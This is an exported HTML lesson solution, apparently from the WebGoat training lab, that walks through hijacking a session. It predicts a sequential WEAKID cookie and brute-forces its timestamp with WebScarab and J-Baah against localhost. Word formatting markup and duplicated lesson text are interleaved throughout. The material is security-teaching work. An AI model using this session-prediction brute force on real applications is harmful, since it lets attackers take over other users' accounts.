UnhideWhenUsed="false" Name="Colorful Shading"/>
<w:LsdException Locked="false" Priority="72" SemiHidden="false"
UnhideWhenUsed="false" Name="Colorful List"/>
<w:LsdException Locked="false" Priority="73" SemiHidden="false"
UnhideWhenUsed="false" Name="Colorful Grid"/>
<w:LsdException Locked="false" Priority="60" SemiHidden="false"
UnhideWhenUsed="false" Name="Light Shading Accent 1"/>
<w:LsdException Locked="false" Priority="61" SemiHidden="false"
UnhideWhenUsed="false" Name="Light List Accent 1"/>
<w:LsdException Locked="false" Priority="62" SemiHidden="false"
UnhideWhenUsed="false" Name="Light Grid Accent 1"/>
<w:LsdException Locked="false" Priority="63" SemiHidden="false"
UnhideWhenUsed="false" Name="Medium Shading 1 Accent 1"/>
<w:LsdException Locked="false" Priority="64" SemiHidden="false"
UnhideWhenUsed="false" Name="Medium Shading 2 Accent 1"/>
<w:LsdException Locked="false" Priority="65" SemiHidden="false"
UnhideWhenUsed="false" Name="Medium List 1 Accent 1"/>
<w:LsdException Locked="false" UnhideWhenUsed="false" Name="Revision"/>
<w:LsdException Locked="false" Priority="34" SemiHidden="false"
UnhideWhenUsed="false" QFormat="true" Name="List Paragraph"/>
<w:LsdException Locked="false" Priority="29" SemiHidden="false"
UnhideWhenUsed="false" QFormat="true" Name="Quote"/>
<w:LsdException Locked="false" Priority="30" SemiHidden="false"
UnhideWhenUsed="false" QFormat="true" Name="Intense Quote"/>
<w:LsdException Locked="false" Priority="66" SemiHidden="false"
UnhideWhenUsed="false" Name="Medium List 2 Accent 1"/>
<w:LsdException Locked="false" Priority="67" SemiHidden="false"
UnhideWhenUsed="false" Name="Medium Grid 1 Accent 1"/>
<w:LsdException Locked="false" Priority="68" SemiHidden="false"
UnhideWhenUsed="false" Name="Medium Grid 2 Accent 1"/>
<w:LsdException Locked="false" Priority="69" SemiHidden="false"
UnhideWhenUsed="false" Name="Medium Grid 3 Accent 1"/>
<w:LsdException Locked="false" Priority="70" SemiHidden="false"
UnhideWhenUsed="false" Name="Dark List Accent 1"/>
<w:LsdException Locked="false" Priority="71" SemiHidden="false"
UnhideWhenUsed="false" Name="Colorful Shading Accent 1"/>
<w:LsdException Locked="false" Priority="72" SemiHidden="false"
UnhideWhenUsed="false" Name="Colorful List Accent 1"/>
<w:LsdException Locked="false" Priority="73" SemiHidden="false"
UnhideWhenUsed="false" Name="Colorful Grid Accent 1"/>
<w:LsdException Locked="false" Priority="60" SemiHidden="false"
UnhideWhenUsed="false" Name="Light Shading Accent 2"/>
<w:LsdException Locked="false" Priority="61" SemiHidden="false"
UnhideWhenUsed="false" Name="Light List Accent 2"/>
<w:LsdException Locked="false" Priority="62" SemiHidden="false"
UnhideWhenUsed="false" Name="Light Grid Accent 2"/>
<w:LsdException Locked="false" Priority="63" SemiHidden="false"
UnhideWhenUsed="false" Name="Medium Shading 1 Accent 2"/>
<w:LsdException Locked="false" Priority="64" SemiHidden="false"
UnhideWhenUsed="false" Name="Medium Shading 2 Accent 2"/>
<w:LsdException Locked="false" Priority="65" SemiHidden="false"
UnhideWhenUsed="false" Name="Medium List 1 Accent 2"/>
<w:LsdException Locked="false" Priority="66" SemiHidden="false"
UnhideWhenUsed="false" Name="Medium List 2 Accent 2"/>
<w:LsdException Locked="false" Priority="67" SemiHidden="false"
UnhideWhenUsed="false" Name="Medium Grid 1 Accent 2"/>
<w:LsdException Locked="false" Priority="68" SemiHidden="false"
UnhideWhenUsed="false" Name="Medium Grid 2 Accent 2"/>
<w:LsdException Locked="false" Priority="69" SemiHidden="false"
UnhideWhenUsed="false" Name="Medium Grid 3 Accent 2"/>
<w:LsdException Locked="false" Priority="70" SemiHidden="false"
UnhideWhenUsed="false" Name="Dark List Accent 2"/>
<w:LsdException Locked="false" Priority="71" SemiHidden="false"
UnhideWhenUsed="false" Name="Colorful Shading Accent 2"/>
<w:LsdException Locked="false" Priority="72" SemiHidden="false"
UnhideWhenUsed="false" Name="Colorful List Accent 2"/>
<w:LsdException Locked="false" Priority="73" SemiHidden="false"
UnhideWhenUsed="false" Name="Colorful Grid Accent 2"/>
<w:LsdException Locked="false" Priority="60" SemiHidden="false"
UnhideWhenUsed="false" Name="Light Shading Accent 3"/>
<w:LsdException Locked="false" Priority="61" SemiHidden="false"
UnhideWhenUsed="false" Name="Light List Accent 3"/>
<w:LsdException Locked="false" Priority="62" SemiHidden="false"
UnhideWhenUsed="false" Name="Light Grid Accent 3"/>
<w:LsdException Locked="false" Priority="63" SemiHidden="false"
UnhideWhenUsed="false" Name="Medium Shading 1 Accent 3"/>
<w:LsdException Locked="false" Priority="64" SemiHidden="false"
UnhideWhenUsed="false" Name="Medium Shading 2 Accent 3"/>
<w:LsdException Locked="false" Priority="65" SemiHidden="false"
UnhideWhenUsed="false" Name="Medium List 1 Accent 3"/>
<w:LsdException Locked="false" Priority="66" SemiHidden="false"
UnhideWhenUsed="false" Name="Medium List 2 Accent 3"/>
<w:LsdException Locked="false" Priority="67" SemiHidden="false"
UnhideWhenUsed="false" Name="Medium Grid 1 Accent 3"/>
<w:LsdException Locked="false" Priority="68" SemiHidden="false"
UnhideWhenUsed="false" Name="Medium Grid 2 Accent 3"/>
<w:LsdException Locked="false" Priority="69" SemiHidden="false"
UnhideWhenUsed="false" Name="Medium Grid 3 Accent 3"/>
<w:LsdException Locked="false" Priority="70" SemiHidden="false"
UnhideWhenUsed="false" Name="Dark List Accent 3"/>
<w:LsdException Locked="false" Priority="71" SemiHidden="false"
UnhideWhenUsed="false" Name="Colorful Shading Accent 3"/>
<w:LsdException Locked="false" Priority="72" SemiHidden="false"
UnhideWhenUsed="false" Name="Colorful List Accent 3"/>
<w:LsdException Locked="false" Priority="73" SemiHidden="false"
UnhideWhenUsed="false" Name="Colorful Grid Accent 3"/>
<w:LsdException Locked="false" Priority="60" SemiHidden="false"
UnhideWhenUsed="false" Name="Light Shading Accent 4"/>
<w:LsdException Locked="false" Priority="61" SemiHidden="false"
UnhideWhenUsed="false" Name="Light List Accent 4"/>
<w:LsdException Locked="false" Priority="62" SemiHidden="false"
UnhideWhenUsed="false" Name="Light Grid Accent 4"/>
<w:LsdException Locked="false" Priority="63" SemiHidden="false"
UnhideWhenUsed="false" Name="Medium Shading 1 Accent 4"/>
<w:LsdException Locked="false" Priority="64" SemiHidden="false"
UnhideWhenUsed="false" Name="Medium Shading 2 Accent 4"/>
<w:LsdException Locked="false" Priority="65" SemiHidden="false"
UnhideWhenUsed="false" Name="Medium List 1 Accent 4"/>
<w:LsdException Locked="false" Priority="66" SemiHidden="false"
UnhideWhenUsed="false" Name="Medium List 2 Accent 4"/>
<w:LsdException Locked="false" Priority="67" SemiHidden="false"
UnhideWhenUsed="false" Name="Medium Grid 1 Accent 4"/>
<w:LsdException Locked="false" Priority="68" SemiHidden="false"
UnhideWhenUsed="false" Name="Medium Grid 2 Accent 4"/>
<w:LsdException Locked="false" Priority="69" SemiHidden="false"
UnhideWhenUsed="false" Name="Medium Grid 3 Accent 4"/>
<w:LsdException Locked="false" Priority="70" SemiHidden="false"
UnhideWhenUsed="false" Name="Dark List Accent 4"/>
<w:LsdException Locked="false" Priority="71" SemiHidden="false"
UnhideWhenUsed="false" Name="Colorful Shading Accent 4"/>
<w:LsdException Locked="false" Priority="72" SemiHidden="false"
UnhideWhenUsed="false" Name="Colorful List Accent 4"/>
<w:LsdException Locked="false" Priority="73" SemiHidden="false"
UnhideWhenUsed="false" Name="Colorful Grid Accent 4"/>
<w:LsdException Locked="false" Priority="60" SemiHidden="false"
UnhideWhenUsed="false" Name="Light Shading Accent 5"/>
<w:LsdException Locked="false" Priority="61" SemiHidden="false"
UnhideWhenUsed="false" Name="Light List Accent 5"/>
<w:LsdException Locked="false" Priority="62" SemiHidden="false"
UnhideWhenUsed="false" Name="Light Grid Accent 5"/>
<w:LsdException Locked="false" Priority="63" SemiHidden="false"
UnhideWhenUsed="false" Name="Medium Shading 1 Accent 5"/>
<w:LsdException Locked="false" Priority="64" SemiHidden="false"
UnhideWhenUsed="false" Name="Medium Shading 2 Accent 5"/>
<w:LsdException Locked="false" Priority="65" SemiHidden="false"
UnhideWhenUsed="false" Name="Medium List 1 Accent 5"/>
<w:LsdException Locked="false" Priority="66" SemiHidden="false"
UnhideWhenUsed="false" Name="Medium List 2 Accent 5"/>
<w:LsdException Locked="false" Priority="67" SemiHidden="false"
UnhideWhenUsed="false" Name="Medium Grid 1 Accent 5"/>
<w:LsdException Locked="false" Priority="68" SemiHidden="false"
UnhideWhenUsed="false" Name="Medium Grid 2 Accent 5"/>
<w:LsdException Locked="false" Priority="69" SemiHidden="false"
UnhideWhenUsed="false" Name="Medium Grid 3 Accent 5"/>
<w:LsdException Locked="false" Priority="70" SemiHidden="false"
UnhideWhenUsed="false" Name="Dark List Accent 5"/>
<w:LsdException Locked="false" Priority="71" SemiHidden="false"
UnhideWhenUsed="false" Name="Colorful Shading Accent 5"/>
<w:LsdException Locked="false" Priority="72" SemiHidden="false"
UnhideWhenUsed="false" Name="Colorful List Accent 5"/>
<w:LsdException Locked="false" Priority="73" SemiHidden="false"
UnhideWhenUsed="false" Name="Colorful Grid Accent 5"/>
<w:LsdException Locked="false" Priority="60" SemiHidden="false"
UnhideWhenUsed="false" Name="Light Shading Accent 6"/>
<w:LsdException Locked="false" Priority="61" SemiHidden="false"
UnhideWhenUsed="false" Name="Light List Accent 6"/>
<w:LsdException Locked="false" Priority="62" SemiHidden="false"
UnhideWhenUsed="false" Name="Light Grid Accent 6"/>
<w:LsdException Locked="false" Priority="63" SemiHidden="false"
UnhideWhenUsed="false" Name="Medium Shading 1 Accent 6"/>
<w:LsdException Locked="false" Priority="64" SemiHidden="false"
UnhideWhenUsed="false" Name="Medium Shading 2 Accent 6"/>
<w:LsdException Locked="false" Priority="65" SemiHidden="false"
UnhideWhenUsed="false" Name="Medium List 1 Accent 6"/>
<w:LsdException Locked="false" Priority="66" SemiHidden="false"
UnhideWhenUsed="false" Name="Medium List 2 Accent 6"/>
<w:LsdException Locked="false" Priority="67" SemiHidden="false"
UnhideWhenUsed="false" Name="Medium Grid 1 Accent 6"/>
<w:LsdException Locked="false" Priority="68" SemiHidden="false"
UnhideWhenUsed="false" Name="Medium Grid 2 Accent 6"/>
<w:LsdException Locked="false" Priority="69" SemiHidden="false"
UnhideWhenUsed="false" Name="Medium Grid 3 Accent 6"/>
<w:LsdException Locked="false" Priority="70" SemiHidden="false"
UnhideWhenUsed="false" Name="Dark List Accent 6"/>
<w:LsdException Locked="false" Priority="71" SemiHidden="false"
UnhideWhenUsed="false" Name="Colorful Shading Accent 6"/>
<w:LsdException Locked="false" Priority="72" SemiHidden="false"
UnhideWhenUsed="false" Name="Colorful List Accent 6"/>
<w:LsdException Locked="false" Priority="73" SemiHidden="false"
UnhideWhenUsed="false" Name="Colorful Grid Accent 6"/>
<w:LsdException Locked="false" Priority="19" SemiHidden="false"
UnhideWhenUsed="false" QFormat="true" Name="Subtle Emphasis"/>
<w:LsdException Locked="false" Priority="21" SemiHidden="false"
UnhideWhenUsed="false" QFormat="true" Name="Intense Emphasis"/>
<w:LsdException Locked="false" Priority="31" SemiHidden="false"
UnhideWhenUsed="false" QFormat="true" Name="Subtle Reference"/>
<w:LsdException Locked="false" Priority="32" SemiHidden="false"
UnhideWhenUsed="false" QFormat="true" Name="Intense Reference"/>
<w:LsdException Locked="false" Priority="33" SemiHidden="false"
UnhideWhenUsed="false" QFormat="true" Name="Book Title"/>
<w:LsdException Locked="false" Priority="37" Name="Bibliography"/>
<w:LsdException Locked="false" Priority="39" QFormat="true" Name="TOC Heading"/>
</w:LatentStyles>
</xml><![endif]-->
<style>
<!--
/* Font Definitions */
@font-face
{font-family:Wingdings;
panose-1:5 0 0 0 0 0 0 0 0 0;
mso-font-charset:2;
mso-generic-font-family:auto;
mso-font-pitch:variable;
mso-font-signature:0 268435456 0 0 -2147483648 0;}
@font-face
{font-family:"MS Mincho";
panose-1:2 2 6 9 4 2 5 8 3 4;
mso-font-alt:"\FF2D\FF33 \660E\671D";
mso-font-charset:128;
mso-generic-font-family:modern;
mso-font-pitch:fixed;
mso-font-signature:-1610612033 1757936891 16 0 131231 0;}
@font-face
{font-family:"Cambria Math";
panose-1:2 4 5 3 5 4 6 3 2 4;
mso-font-charset:0;
mso-generic-font-family:roman;
mso-font-pitch:variable;
mso-font-signature:-1610611985 1107304683 0 0 159 0;}
@font-face
{font-family:Tahoma;
panose-1:2 11 6 4 3 5 4 4 2 4;
mso-font-charset:0;
mso-generic-font-family:swiss;
mso-font-pitch:variable;
mso-font-signature:1627400839 -2147483648 8 0 66047 0;}
@font-face
{font-family:"\@MS Mincho";
panose-1:2 2 6 9 4 2 5 8 3 4;
mso-font-charset:128;
mso-generic-font-family:modern;
mso-font-pitch:fixed;
mso-font-signature:-1610612033 1757936891 16 0 131231 0;}
/* Style Definitions */
p.MsoNormal, li.MsoNormal, div.MsoNormal
{mso-style-unhide:no;
mso-style-qformat:yes;
mso-style-parent:"";
margin:0cm;
margin-bottom:.0001pt;
mso-pagination:widow-orphan;
font-size:12.0pt;
font-family:"Times New Roman","serif";
mso-fareast-font-family:"Times New Roman";}
h1
{mso-style-unhide:no;
mso-style-qformat:yes;
mso-style-link:"Heading 1 Char";
mso-style-next:Normal;
margin-top:12.0pt;
margin-right:0cm;
margin-bottom:3.0pt;
margin-left:0cm;
mso-pagination:widow-orphan;
page-break-after:avoid;
mso-outline-level:1;
font-size:16.0pt;
font-family:"Arial","sans-serif";
mso-fareast-font-family:"MS Mincho";
mso-font-kerning:16.0pt;
mso-fareast-language:JA;
font-weight:bold;}
h2
{mso-style-noshow:yes;
mso-style-priority:9;
mso-style-qformat:yes;
mso-style-link:"Heading 2 Char";
mso-style-next:Normal;
margin-top:10.0pt;
margin-right:0cm;
margin-bottom:0cm;
margin-left:0cm;
margin-bottom:.0001pt;
mso-pagination:widow-orphan lines-together;
page-break-after:avoid;
mso-outline-level:2;
font-size:13.0pt;
font-family:"Cambria","serif";
mso-ascii-font-family:Cambria;
mso-ascii-theme-font:major-latin;
mso-fareast-font-family:"Times New Roman";
mso-fareast-theme-font:major-fareast;
mso-hansi-font-family:Cambria;
mso-hansi-theme-font:major-latin;
mso-bidi-font-family:"Times New Roman";
mso-bidi-theme-font:major-bidi;
color:#4F81BD;
mso-themecolor:accent1;
font-weight:bold;}
p.MsoCaption, li.MsoCaption, div.MsoCaption
{mso-style-noshow:yes;
mso-style-qformat:yes;
mso-style-next:Normal;
margin:0cm;
margin-bottom:.0001pt;
mso-pagination:widow-orphan;
font-size:10.0pt;
font-family:"Times New Roman","serif";
mso-fareast-font-family:"Times New Roman";
font-weight:bold;}
p.MsoEnvelopeReturn, li.MsoEnvelopeReturn, div.MsoEnvelopeReturn
{mso-style-noshow:yes;
mso-style-priority:99;
margin:0cm;
margin-bottom:.0001pt;
mso-pagination:widow-orphan;
font-size:12.0pt;
font-family:"Times New Roman","serif";
mso-fareast-font-family:"Times New Roman";
mso-fareast-theme-font:major-fareast;}
a:link, span.MsoHyperlink
{mso-style-noshow:yes;
color:blue;
text-decoration:underline;
text-underline:single;}
a:visited, span.MsoHyperlinkFollowed
{mso-style-noshow:yes;
mso-style-priority:99;
color:purple;
mso-themecolor:followedhyperlink;
text-decoration:underline;
text-underline:single;}
p
{mso-style-noshow:yes;
mso-style-priority:99;
mso-margin-top-alt:auto;
margin-right:0cm;
mso-margin-bottom-alt:auto;
margin-left:0cm;
mso-pagination:widow-orphan;
font-size:12.0pt;
font-family:"Times New Roman","serif";
mso-fareast-font-family:"Times New Roman";}
p.MsoAcetate, li.MsoAcetate, div.MsoAcetate
{mso-style-noshow:yes;
mso-style-priority:99;
mso-style-link:"Balloon Text Char";
margin:0cm;
margin-bottom:.0001pt;
mso-pagination:widow-orphan;
font-size:8.0pt;
font-family:"Tahoma","sans-serif";
mso-fareast-font-family:"Times New Roman";}
span.Heading1Char
{mso-style-name:"Heading 1 Char";
mso-style-unhide:no;
mso-style-locked:yes;
mso-style-link:"Heading 1";
mso-ansi-font-size:16.0pt;
mso-bidi-font-size:16.0pt;
font-family:"MS Mincho";
mso-ascii-font-family:"MS Mincho";
mso-fareast-font-family:"MS Mincho";
mso-hansi-font-family:"MS Mincho";
mso-bidi-font-family:Arial;
mso-font-kerning:16.0pt;
mso-fareast-language:JA;
font-weight:bold;}
span.Heading2Char
{mso-style-name:"Heading 2 Char";
mso-style-noshow:yes;
mso-style-priority:9;
mso-style-unhide:no;
mso-style-locked:yes;
mso-style-link:"Heading 2";
mso-ansi-font-size:13.0pt;
mso-bidi-font-size:13.0pt;
font-family:"Cambria","serif";
mso-ascii-font-family:Cambria;
mso-ascii-theme-font:major-latin;
mso-fareast-font-family:"Times New Roman";
mso-fareast-theme-font:major-fareast;
mso-hansi-font-family:Cambria;
mso-hansi-theme-font:major-latin;
color:#4F81BD;
mso-themecolor:accent1;
font-weight:bold;}
span.BalloonTextChar
{mso-style-name:"Balloon Text Char";
mso-style-noshow:yes;
mso-style-priority:99;
mso-style-unhide:no;
mso-style-locked:yes;
mso-style-link:"Balloon Text";
mso-ansi-font-size:8.0pt;
mso-bidi-font-size:8.0pt;
font-family:"Tahoma","sans-serif";
mso-ascii-font-family:Tahoma;
mso-fareast-font-family:"Times New Roman";
mso-hansi-font-family:Tahoma;
mso-bidi-font-family:Tahoma;}
.MsoChpDefault
{mso-style-type:export-only;
mso-default-props:yes;
font-size:10.0pt;
mso-ansi-font-size:10.0pt;
mso-bidi-font-size:10.0pt;
mso-ascii-font-family:Arial;
mso-fareast-font-family:Calibri;
mso-fareast-theme-font:minor-latin;
mso-hansi-font-family:Arial;
mso-bidi-font-family:"Times New Roman";
mso-bidi-theme-font:major-bidi;}
@page Section1
{size:612.0pt 792.0pt;
margin:72.0pt 72.0pt 72.0pt 72.0pt;
mso-header-margin:35.4pt;
mso-footer-margin:35.4pt;
mso-paper-source:0;}
div.Section1
{page:Section1;}
-->
</style>
<!--[if gte mso 10]>
<style>
/* Style Definitions */
table.MsoNormalTable
{mso-style-name:"Table Normal";
mso-tstyle-rowband-size:0;
mso-tstyle-colband-size:0;
mso-style-noshow:yes;
mso-style-priority:99;
mso-style-qformat:yes;
mso-style-parent:"";
mso-padding-alt:0cm 5.4pt 0cm 5.4pt;
mso-para-margin:0cm;
mso-para-margin-bottom:.0001pt;
mso-pagination:widow-orphan;
font-size:10.0pt;
font-family:"Arial","sans-serif";
mso-bidi-font-family:"Times New Roman";
mso-bidi-theme-font:major-bidi;}
</style>
<![endif]--><!--[if gte mso 9]><xml>
<o:shapedefaults v:ext="edit" spidmax="3074"/>
</xml><![endif]--><!--[if gte mso 9]><xml>
<o:shapelayout v:ext="edit">
<o:idmap v:ext="edit" data="1"/>
</o:shapelayout></xml><![endif]-->
<meta http-equiv="Content-Type" content="text/html; charset=ISO-8859-1">
<title>Solution: How to Hijack a Session</title>
<link rel="stylesheet" type="text/css" href="lesson_solutions/formate.css">
</head>
<body>
<p><b>Lesson Plan Title:</b> How to Hijack a Session</p>
<body lang=EN-US link=blue vlink=purple style='tab-interval:36.0pt'>
<p><b>Concept / Topic To Teach:</b><br/>
Application developers who develop their own session IDs frequently forget to incorporate the complexity and randomness necessary for security. If the user specific session ID is not complex and random, then the application is highly susceptible to session-based brute force attacks.
</p>
<div class=Section1>
<p><b>General Goal(s):</b><br/>
Try to access an authenticated session belonging to someone else. <br/><br/>
In this lesson we are trying to predict the WEAKID value. THe WEAKID is used to differentiate authenticated and anonymous users of WebGoat.
</p>
<p class=MsoNormal><span style='font-family:"Arial","sans-serif"'><o:p>&nbsp;</o:p></span></p>
<b>Solution:</b><br/><br/>
The easiest way to complete this lesson is to use WebScarab's Session ID Analysis feature. The Solution Videos provide another method of uncovering it as well.<br/><br/>
To access the Session ID Analysis, you need to put WebScarab in its full-featured mode, if it isn't already. This can be enabled by going to <b>Tools -> use full-featured interface</b> in WebScarab.<br/>
Click on the SessionID Analysis tab at the top of the page, then use the <b>Previous Requests</b> dropdown to select the most recent GET request with a 200 OK header. Its address will end with webgoat/attack, not an image or java file.<br/><br/>
<p class=MsoNormal><b><span style='font-family:"Arial","sans-serif"'>Lesson
Plan Title:</span></b><span style='font-family:"Arial","sans-serif"'> How to
Hijack a Session<o:p></o:p></span></p>
<img src="lesson_solutions/WeakSessionID_files/image001.jpg"><br/>
<font size="2"><b>Selecting the correct GET request for Session ID analysis.</b></font><br/><br/>
<p class=MsoNormal><b><span style='font-family:"Arial","sans-serif"'><o:p>&nbsp;</o:p></span></b></p>
Next, we need to make sure that WebScarab is able to fetch the WEAKID cookie. Click the <b>Test</b> button at the bottom of the page. You should get a popup window showing the WEAKID.<br/><br/>
<p class=MsoNormal><b><span style='font-family:"Arial","sans-serif"'>Concept /
Topic To Teach:</span></b><span style='font-family:"Arial","sans-serif"'> <o:p></o:p></span></p>
<img src="lesson_solutions/WeakSessionID_files/image002.jpg"><br/>
<font size="2"><b>Succesful WEAKID test popup.</b></font><br/><br/>
<!-- Start Instructions -->
If the popup indicates that no valid session is found, that means there is already a WEAKID value in the request. This prevents the &quot;Set-Cookie&quot; header from being sent in the response. To fix this, delete the <b>WEAKID=value;</b> portion of the Cookie header and press test again.<br/><br/>
<p class=MsoNormal><span style='font-family:"Arial","sans-serif"'>Application
developers who develop their own session IDs frequently forget to incorporate
the complexity and randomness necessary for security. If the user specific
session ID is not complex and random, then the application is highly
susceptible to session-based brute force attacks. <o:p></o:p></span></p>
Now we need to fetch a set of WEAKIDs. Enter &quot;50&quot; into the <b>Samples</b> field at the bottom of the window, then press <b>Fetch</b>. Switch to the &quot;Analysis&quot; tab. Select the WEAKID option from the <b>Session Identifier</b> dropdown, and the window should populate with WEAKID values.<br/><br/>
<p class=MsoNormal><b><span style='font-family:"Arial","sans-serif"'><o:p>&nbsp;</o:p></span></b></p>
The WEAKID is divided into two parts: the first part before the dash is an identifier that increases by 1 in each cookie, and the part after the dash is a time value that is calculated when the request is submitted.<br/>
Notice that there is sometimes a gap in the first value of the WEAKID, where one number is skipped. The missing value is what we need to log in, we just need to figure out the time stamp value that goes after the dash.<br/><br/>
It's simple to spot where this value is. Look at the &quot;Difference&quot; column on the analysis screen. Almost all of the values will be only one or two apart. We are looking for the record where this value is around double the rest of them.<br/><br/>
<p class=MsoNormal><b><span style='font-family:"Arial","sans-serif"'>General
Goal(s):</span></b><span style='font-family:"Arial","sans-serif"'> <o:p></o:p></span></p>
<img src="lesson_solutions/WeakSessionID_files/image003.jpg"><br/>
<font size="2"><b>Analysis screen with the cookie of interest highlighted.</b></font><br/><br/>
<p class=MsoNormal><span style='font-family:"Arial","sans-serif"'>Try to access
an authenticated session belonging to someone else. <o:p></o:p></span></p>
This WEAKID follows the one we're trying to find. You will notice the identifier of the cookie preceding the highlighted one is two less, whereas all the other cookies decrease only by one. The one missing is what we want to find:<br/>
<b><font color="red">16964</font>-1312472439375</b><br/>
<b><font color="red">16966</font>-1312472439484</b><br/><br/>
The WEAKID beginning with <b>16965</b> is missing. This is the WEAKID we want, we just need to figure out the second part.<br/>
<!-- Stop Instructions -->
We'll figure this out by using the brute force method. We will send requests with each possible timestamp value until we find one that is successful. Its timestamp must be between the two surrounding it:<br/>
<b>16964-<font color="red">1312472439375</font></b><br/>
<b>16965-<font color="red">?????????????</font></b><br/>
<b>16966-<font color="red">1312472439484</font></b><br/><br/>
<p class=MsoNormal><span style='font-family:"Arial","sans-serif"'><o:p>&nbsp;</o:p></span></p>
So our timestamp is between <b>1312472439375</b> and <b>1312472439484</b>. Now we just need a program to do brute force this for us. We will use <a href="http://www.sensepost.com/labs/tools/pentest/j-baah" target="_blank">J-Baah</a>, previously known as Crowbar. Download it and run the .jar.<br/><br/>
We will configure J-Baah to send our request repeatedly, with a different WEAKID each time. Copy our RAW HTTP Request we used to generate these cookies, found under the Collection tab. Paste it in the Request box in J-Baah.<br/><br/>
<p class=MsoNormal><span style='font-family:"Arial","sans-serif"'>In this
lesson the purpose is to predict the WEAKID value. The WEAKID is used to
differentiate authenticated and anonymous users of WebGoat.<o:p></o:p></span></p>
The WEAKID paramter needs to be put into the request. It will begin with the missing value we figured out before the dash, <b>16965</b> in our case. How do we fill in the rest when we dont know what it is?<br/>
In this case, we will add <b>WEAKID=16965-1312472439<font color="red">##1##</font>;</b> to the Cookie paramter of our request. The <b><font color="red">##1##</font></b> replaces the part of the timestamp that varies in our range. Next, we specify this range. In the Paramter 1 Tab, we set <b>From</b> as 375, and <b>To</b> as 484.<br/><br/>
<p class=MsoNormal><span style='font-family:"Arial","sans-serif"'><o:p>&nbsp;</o:p></span></p>
<img src="lesson_solutions/WeakSessionID_files/image004.jpg"><br/>
<font size="2"><b>J-Baah setup.</b></font><br/><br/>
Lastly, go to the &quot;Target&quot; tab at the bottom right, and set the <b>Host</b> to localhost and the <b>Port</b> to whichever port WebGoat is using, generally 80 or 8080.<br/>
Go back to the &quot;Action&quot; tab, and click <b>Base Response</b>. You should see a message on the bottom left that a response is generated successfully. Change <b>Threads</b> to 2 and then press <b>Start</b>. The bottom left window should start filling up with &quot;Hijack a session&quot;<br/><br/>
<p class=MsoNormal><span style='font-family:"Arial","sans-serif";mso-no-proof:
yes'><!--[if gte vml 1]><v:shapetype id="_x0000_t75" coordsize="21600,21600"
o:spt="75" o:preferrelative="t" path="m@4@5l@4@11@9@11@9@5xe" filled="f"
stroked="f">
<v:stroke joinstyle="miter"/>
<v:formulas>
<v:f eqn="if lineDrawn pixelLineWidth 0"/>
<v:f eqn="sum @0 1 0"/>
<v:f eqn="sum 0 0 @1"/>
<v:f eqn="prod @2 1 2"/>
<v:f eqn="prod @3 21600 pixelWidth"/>
<v:f eqn="prod @3 21600 pixelHeight"/>
<v:f eqn="sum @0 0 1"/>
<v:f eqn="prod @6 1 2"/>
<v:f eqn="prod @7 21600 pixelWidth"/>
<v:f eqn="sum @8 21600 0"/>
<v:f eqn="prod @7 21600 pixelHeight"/>
<v:f eqn="sum @10 21600 0"/>
</v:formulas>
<v:path o:extrusionok="f" gradientshapeok="t" o:connecttype="rect"/>
<o:lock v:ext="edit" aspectratio="t"/>
</v:shapetype><v:shape id="Picture_x0020_785" o:spid="_x0000_i1034" type="#_x0000_t75"
style='width:480pt;height:276.75pt;visibility:visible;mso-wrap-style:square'>
<v:imagedata src="lesson_solutions/WeakSessionID_files/image001.png" o:title=""/>
</v:shape><![endif]--><![if !vml]><img width=640 height=369
src="lesson_solutions/WeakSessionID_files/image020.jpg" v:shapes="Picture_x0020_785"><![endif]></span><span
style='font-family:"Arial","sans-serif"'><o:p></o:p></span></p>
<img src="lesson_solutions/WeakSessionID_files/image005.jpg"><br/>
<font size="2"><b>All of the responses for each WEAKID. The successful attempt is highlighted.</b></font><br/><br/>
<p class=MsoNormal><span style='font-family:"Arial","sans-serif"'><o:p>&nbsp;</o:p></span></p>
<p class=MsoNormal><span style='font-family:"Arial","sans-serif"'><o:p>&nbsp;</o:p></span></p>
Before we go any further, it is important to understand what is happening here. The <b>##1##</b> string is replaced with a different number in the range we specified and the request is sent. The first WEAKID tried is <b>16965-1312472439375</b>, then it tries every timestamp until the last one, <b>16965-1312472439484</b>. J-Baah collects all of these responses and shows them in the bottom left window.<br/><br/>
<p class=MsoNormal><b><span style='font-family:"Arial","sans-serif"'>Solution:</span></b><span
style='font-family:"Arial","sans-serif"'><o:p></o:p></span></p>
Each line shows one response, and displays important information about it.<br/><br/>
<b><font color="red">0.99969</font> : 417 : : Hijack a Session</b><br/>
Clicking base response tries the first WEAKID and sets its response as the control. This first number indicates how similar this response is to the base response. A value of 1 means the responses are identical. The further the number is from 1, the more different this response is.<br/>
<br/>
<b>0.99969 : <font color="red">417</font> : : Hijack a Session</b><br/>
This second number is the value replacing the <b>##1##</b> in our request.<br/><br/>
<b>0.99969 : 417 : : <font color="red">Hijack a Session</font></b><br/>
The last portion is the title of the response page. In this case, if it's not &quot;Hijack a Session&quot;, something went wrong.<br/><br/>
<p class=MsoNormal><span style='font-family:"Arial","sans-serif"'><o:p>&nbsp;</o:p></span></p>
The value indicating similarity to the base response will tell us which WEAKID worked. If everything went swimmingly, there should only be three values for this number. Look again at the screenshot above. There are many responses showing .99969, one showing .9949, then many more showing .99954. The response stayed the same until we got to the WEAKID ending in 429, then it changed. This is where the brute force succeeded. Right click on this response and click &quot;Show Response&quot;.<br/><br/>
<p class=MsoNormal><span style='font-family:"Arial","sans-serif"'>The easiest
way to complete this lesson is to use WebScarab's Session ID Analysis.<o:p></o:p></span></p>
<img src="lesson_solutions/WeakSessionID_files/image006.jpg"><br/>
<font size="2"><b>This WEAKID worked! We hijacked this session.</b></font><br/><br/>
<p class=MsoNormal><span style='font-family:"Arial","sans-serif"'><o:p>&nbsp;</o:p></span></p>
Refreshing the lesson should show it is complete.<br/><br/>
<p class=MsoNormal><span style='font-family:"Arial","sans-serif"'>Go to
WebScarab and click on the button "SessionID Analysis". Select the last POST
request from the "Previous requests" drop-down box.<o:p></o:p></span></p>
<p class=MsoNormal style='page-break-after:avoid'><span style='font-family:
"Arial","sans-serif";mso-no-proof:yes'><!--[if gte vml 1]><v:shape id="Picture_x0020_786"
o:spid="_x0000_i1033" type="#_x0000_t75" style='width:480pt;height:276.75pt;
visibility:visible;mso-wrap-style:square'>
<v:imagedata src="lesson_solutions/WeakSessionID_files/image003.png" o:title=""/>
</v:shape><![endif]--><![if !vml]><img width=640 height=369
src="lesson_solutions/WeakSessionID_files/image021.jpg" v:shapes="Picture_x0020_786"><![endif]></span></p>
<p class=MsoCaption>Figure <!--[if supportFields]><span style='mso-element:
field-begin'></span><span style='mso-spacerun:yes'> </span>SEQ Figure \* ARABIC
<span style='mso-element:field-separator'></span><![endif]--><span
